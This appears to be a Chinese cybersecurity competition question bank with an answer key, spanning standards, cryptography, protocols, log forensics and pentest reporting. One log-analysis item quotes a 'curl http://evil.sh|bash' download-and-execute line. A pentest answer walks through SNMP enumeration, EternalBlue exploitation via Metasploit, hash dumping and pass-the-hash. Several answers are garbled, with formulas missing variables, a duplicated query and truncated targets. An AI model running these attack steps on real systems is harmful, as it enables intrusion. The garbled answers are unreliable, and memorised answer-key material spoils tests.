2026年网络安全知识竞赛试题库(带答案)

2026年网络安全知识竞赛试题库(带答案)单选题（每题1分，共30分。每题只有一个正确答案，请将正确选项字母填入括号）1.在GB/T22239-2019《信息安全技术网络安全等级保护基本要求》中，第三级安全要求对“入侵防范”明确提出：应在关键网络节点处检测、防止或限制（）攻击。A.跨站脚本B.拒绝服务C.目录遍历D.点击劫持答案：B2.若某Web应用采用JWT作为会话令牌，下列哪项配置可有效降低令牌被重放的风险（）A.将alg设为HS256B.在payload中加入exp字段C.将令牌存入localStorageD.使用URL编码传输令牌答案：B3.在Linux系统中，若文件权限为“-rwsr-xr-x”，则该文件的s位属于（）A.设置组IDB.设置用户IDC.粘滞位D.强制锁答案：B4.针对内存破坏漏洞，下列缓解机制中，主要用来阻止代码执行的是（）A.ASLRB.DEP/NXC.StackCanaryD.RELRO答案：B5.在IPv6网络中，用于发现重复地址的报文类型是（）A.RouterSolicitationB.NeighborAdvertisementC.NeighborSolicitationD.Redirect答案：C6.按照《密码法》，我国对涉及国家安全的加密产品实施（）检测认证制度。A.自愿性B.推荐性C.强制性D.备案式答案：C7.在Windows事件日志中，成功登录的事件ID为（）A.4624B.4625C.4672D.4648答案：A8.使用nmap扫描目标/24中所有在线主机的命令是（）A.nmap-sP-255B.nmap-sn/24C.nmap-sS/24D.nmap-O/24答案：B9.在公钥基础设施中，负责发布证书撤销列表（CRL）的实体是（）A.RAB.CAC.VAD.OCSP答案：B10.下列哪种算法被我国SM2椭圆曲线密码算法直接替代，不再推荐用于新建系统（）A.RSA-1024B.AES-128C.SHA-1D.ECB答案：A11.在SQL注入联合查询中，若原查询列为3，则攻击者常用以下哪一子句进行字段数匹配（）A.ORDERBYB.GROUPBYC.LIMITD.UNION答案：A12.在Kerberos协议中，TGT的加密密钥来源于（）A.用户口令派生B.服务账号NTLMHashC.KDC私钥D.会话密钥答案：A13.当防火墙工作在透明桥模式时，其转发决策主要依据（）A.路由表B.MAC地址表C.会话表D.NAT表答案：B14.在OWASPTop102021中，排名首位的是（）A.失效的访问控制B.加密失败C.注入D.不安全的设计答案：A15.若某RSA密钥模数n=pq，其中p=61，q=53，则欧拉函数φ(n)等于（）A.3183B.3120C.3230D.3600答案：B16.在BGP安全扩展中，用于验证路由通告真实性的机制是（）A.RPKIB.BGPsecC.ROAD.ASPA答案：B17.在Android10及以上版本，应用访问设备IMEI需要申请的权限是（）A.READ_PHONE_STATEB.READ_PRIVILEGED_PHONE_STATEC.ACCESS_NETWORK_STATED.READ_SMS答案：B18.在零信任架构中，用于持续评估访问主体信任等级的核心组件是（）A.SIEMB.PolicyEngineC.VPND.IDS答案：B19.在Wireshark过滤器中，筛选所有TCPSYN包的表达式是（）A.tcp.flags==0x002B.tcp.flags.syn==1C.tcp.syn==1D.tcp.flags==SYN答案：B20.若某网站启用了HSTS，且预加载列表包含该域名，则浏览器首次访问时会（）A.先HTTP再HTTPSB.直接HTTPSC.出现证书错误D.忽略重定向答案：B21.在Python3中，使用hashlib计算SM3杂凑值应调用（）A.hashlib.sm3()B.hashlib.new('sm3')C.sm3.hash()D.需安装gmssl库后调用答案：D22.在Linux审计子系统auditd中，定义文件监控规则的参数是（）A.-wB.-pC.-kD.-S答案：A23.在无线渗透中，用于伪造802.11Deauthentication帧的工具是（）A.aireplay-ngB.airbase-ngC.kismetD.wifite答案：A24.在容器安全中，可限制进程使用系统调用的Linux安全机制是（）A.seccompB.capabilitiesC.AppArmorD.SELinux答案：A25.在《数据安全法》中，对“重要数据”实行（）保护制度。A.分级分类B.统一加密C.最小可用D.全生命周期答案：A26.在IPv4报文头部，用于防止分片重组攻击的字段是（）A.TTLB.IDC.DFD.MF答案：C27.在威胁情报共享标准中，STIX对象用于描述攻击者所用软件的是（）A.malwareB.indicatorC.campaignD.intrusion-set答案：A28.在Windows中，用于查看当前登录用户访问令牌的命令是（）A.whoami/allB.netuserC.quserD.klist答案：A29.在HTTPS握手阶段，服务端发送的“Certificate”消息放在哪条记录之下（）A.ChangeCipherSpecB.HandshakeC.ApplicationDataD.Alert答案：B30.在等保2.0安全区域边界，第三级要求对“非授权设备”进行（）A.行为审计B.合规性检查C.单向隔离D.阻断或报警答案：D多选题（每题2分，共20分。每题有两个或两个以上正确答案，多选少选均不得分）31.以下哪些属于对称加密算法（）A.SM4B.AESC.RSAD.3DES答案：ABD32.关于DNSSEC，下列说法正确的是（）A.使用RRSIG记录提供签名B.使用DS记录建立信任链C.可防止DNS缓存投毒D.需要根区参与签名答案：ABCD33.在Linux系统中，以下哪些命令可用于查看当前网络连接状态（）A.ssB.netstatC.lsof-iD.psaux答案：ABC34.以下哪些HTTP头部可缓解点击劫持（）A.X-Frame-OptionsB.Content-Security-PolicyC.Strict-Transport-SecurityD.X-Content-Type-Options答案：AB35.在Windows日志清除痕迹时，攻击者可能操作以下哪些日志文件（）A.Security.evtxB.System.evtxC.Application.evtxD.Setup.evtx答案：ABC36.以下哪些属于社会工程学攻击（）A.鱼叉钓鱼B.假冒客服C.USB丢弃D.缓冲区溢出答案：ABC37.在PKI体系中，构成信任锚的要素包括（）A.根CA证书B.自签名C.公钥D.CRL分发点答案：ABC38.以下哪些技术可用于Web应用防自动化登录（）A.验证码B.行为生物识别C.IP频率限制D.图形滑块答案：ABCD39.在无线安全标准中，WPA3相对于WPA2的改进有（）A.SAE替代四次握手B.提供前向保密C.禁用TKIPD.强制PMF答案：ABD40.以下哪些属于我国《关键信息基础设施安全保护条例》中认定的关键业务（）A.金融支付清算B.大型医院电子病历C.云计算平台D.网约车订单答案：ABC填空题（每空1分，共20分）41.在TLS1.3中，完成一次完整握手需要________次往返，若启用0-RTT则浏览器可提前发送________数据。答案：1，应用42.若某SHA-256的输入消息长度为1024位，则填充域的二进制值为________，总长度域占________位。答案：10000000，6443.在Linux能力机制中，允许进程修改系统时间的capability名称为________，其数值为________。答案：CAP_SYS_TIME，2544.在IPv6地址2001:0db8:0000:0000:0000:ff00:0042:8329的压缩写法中，可缩写为________。答案：2001:db8::ff00:42:832945.在Windows远程桌面协议RDP中，默认服务端口为________，其注册表键值位于________。答案：3389，HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp46.在公钥密码学中，若椭圆曲线方程为y²=x³+ax+b，且曲线定义于素域Fp，则判别式需满足________≠0。答案：4a³+27b²47.在SQL注入中，若数据库为MySQL，利用load_file函数读取/etc/passwd的条件是：当前用户具有________权限，且secure_file_priv值为________。答案：FILE，空字符串48.在Android应用签名方案v3中，新增支持________旋转功能，其签名块ID为________。答案：密钥，0xf05368c049.在等保2.0中，第三级安全要求“剩余信息保护”针对________内存与________存储。答案：用户，临时50.在BGP报文中，用于维持邻居关系的Keepalive消息，其固定长度为________字节，发送间隔默认________秒。答案：19，60判断题（每题1分，共10分。正确打“√”，错误打“×”）51.SM3杂凑算法输出长度为256位，其结构与SHA-256完全相同。答案：×52.在Linux中，若文件权限为“-rw-r--r--”，则文件所有者无法执行该文件。答案：√53.使用WPA2-PSK时，若口令长度超过20位，则无法通过离线字典攻击破解。答案：×54.在IPv6中，HopLimit字段作用等价于IPv4的TTL字段。答案：√55.Windows系统内置的BitLocker驱动器加密默认使用AES-XTS-128。答案：√56.在TLS1.3中，所有握手消息均使用AEAD加密，不再出现明文Certificate消息。答案：√57.在Android中，应用申请ACCESS_FINE_LOCATION权限即可读取基站CellID，无需额外权限。答案：×58.在PKI中，若CA私钥泄露，则只需吊销该CA证书即可，无需重新签发所有终端实体证书。答案：×59.使用nmap-sV选项可同时进行端口扫描与服务版本探测。答案：√60.在等保2.0中，云计算扩展要求将云服务方与云租户的安全责任完全分离，不再要求共同责任。答案：×简答题（每题6分，共30分）61.简述Kerberos协议中“双重票据”攻击的原理，并给出两种防御措施。答案：攻击者通过导出内存中的TGT或服务票据，在另一主机上重放，实现横向移动。防御：1.启用PAC验证，服务验证票据PAC签名；2.配置用户帐户“敏感帐户，不能被委派”，限制委派范围；3.使用高级审计监控4624/4769事件异常来源IP。62.说明HTTPHost头攻击的产生原因，并给出Web服务器与代码层各一条修复建议。答案：原因：服务器依赖Host头生成绝对URL，但未校验其合法性。修复：服务器层——Nginx设置server_name_hash并拒绝非匹配Host；代码层——使用白名单数组allowed_hosts，仅当$_SERVER['HTTP_HOST']在白名单时才生成链接。63.列举Linux下实现强制访问控制（MAC）的两种主流框架，并比较其策略语言特点。答案：SELinux：使用类型强制（TE）与角色、多层安全，策略语言为.te/.if/.fc，语法复杂，支持MLS。AppArmor：使用路径名作为标签，策略语言为profile，易读易写，不支持MLS，适合桌面与服务器。64.简述国密SM2数字签名生成流程，并指出与ECDSA的核心差异。答案：流程：1.计算ZA=SM3(ENTLA∥IDA∥a∥b∥xG∥yG∥xA∥yA)；2.计算e=SM3(ZA∥M)；3.随机k∈[1,n-1]；4.计算(x1,y1)=[k]G；5.r=(e+x1)modn，若r=0或r+k=n则重选；6.s=((1+dA)⁻¹·(k-r·dA))modn，若s=0则重选；7.输出(r,s)。差异：SM2引入ZA绑定用户身份与椭圆曲线参数，防止跨域重放；ECDSA无ZA，直接对消息哈希签名。65.说明零信任网络中“微分段”概念，并给出数据中心场景下的一个实现方案。答案：微分段指将网络按业务粒度划分为最小可管理单元，每单元独立策略。实现：基于VXLAN+身份防火墙，使用VMwareNSX-T，为每虚拟机分配分布式防火墙规则，策略以AD组标签为匹配条件，默认拒绝，仅开放业务必需端口，所有流量经网关级身份认证与加密。应用综合题（共40分）66.计算与分析（10分）某单位采用RSA-2048加密邮件，已知公钥指数e=65537，私钥d泄露前n位，其中n=200位。攻击者已获取密文C=1234567890ABCDEF16，并知n的200位高位。请回答：(1)写出利用Coppersmith方法恢复完整d的数学模型（给出关键公式与约束条件，使用LaTeX）。(2)若实际测试表明当泄露位≥256时可在1小时内恢复，则该单位应如何升级密钥管理？答案：(1)设d=+·x，其中为已知高位，x已知ed≡1(mod利用Coppersmith定理，当|x|<时可多项式时间求解，其中β(2)立即吊销原证书，生成新RSA-4096密钥；将私钥存入FIPS140-3认证HSM，启用M-of-N门限拆分；启用密钥轮换策略，每90天更新一次；对历史邮件使用新密钥重新加密归档。67.日志分析（10分）给出一段Linuxaudit日志：type=SYSCALLmsg=audit(1672588800.123:123456):arch=c000003esyscall=59success=yesexit=0a0=7ffd45f3a8a8a1=7ffd45f3a9c0a2=7ffd45f3a9e0a3=7items=2ppid=1000pid=1001auid=1000uid=0gid=0euid=0suid=0fsuid=0tty=pts1comm="bash"exe="/bin/bash"key="execve"type=EXECVEmsg=audit(1672588800.123:123456):argc=2a0="curl"a1="http://evil.sh|bash"(1)指出该日志反映的攻击行为；(2)给出一条audit规则，可提前记录此类行为；(3)使用Splunk检索语法，统计过去7天同一auid触发execve且含curl|bash的次数。答案：(1)用户auid=1000通过bash执行curl下载并管道执行远程恶意脚本，属命令注入/远程下载执行攻击。(2)auditctl-aalways,exit-Farch=b64-Sexecve-Fpath=/usr/bin/curl-Fkey=curl_exec(3)index=linux_auditsyscall=59curlOR"curl"|rexfield=EXECVE"a0=\"(?<cmd>\w+)\""|wherecmd="curl"ANDmatch(EXECVE,"curl.bash")|statscountbyauid(3)index=linux_auditsyscall=59curlOR"curl"|rexfield=EXECVE"a0=\"(?<cmd>\w+)\""|wherecmd="curl"ANDmatch(EXECVE,"curl.bash")|statscountbyauid68.渗透测试报告撰写（10分）某次授权渗透发现：目标内网使用SNMPv2c团体字“public”，通过OID..6枚举出Windows主机用户列表，并进一步利用MS17-010获取SYSTEM权限。请按“风险描述→影响→复现步骤→修复建议”四段式写出漏洞条目，要求语言简洁、可操作。答案：风险描述：内网交换机与服务器启用SNMPv2c且使用默认团体字“public”，攻击者通过walk枚举敏感信息，并结合永恒之蓝实现横向移动。影响：可导致完全接管域控，造成数据泄露与业务中断，风险等级“严重”。复现步骤：1.攻击机执行snmpwalk-v2c-cpublic0..6获取在线用户；2.使用metasploit模块exploit/windows/smb/ms17_010_eternalblue，设置RHOST与PAYLOAD，获取SYSTEMshell；3.执行hashdump导出NTLMHash，进一步PTH登录域控。修复建议：1.升级SNMPv3，启用authPriv，用户名+AES加密；2.修改默认团体字，长度≥16位随机字符；3.在边界防火墙禁止UDP161/162入站；4.全网打补丁KB4013389，启用SMB签名与WindowsDefender网络保护。69.安全开发（10分）某JavaSpringBoot接口接收用户上传的zip文件并解压，代码片段：Stringdir="/tmp/upload/"+userId;ZipInputStreamzis=newZipInputStream(file.getInputStream());ZipEntryentry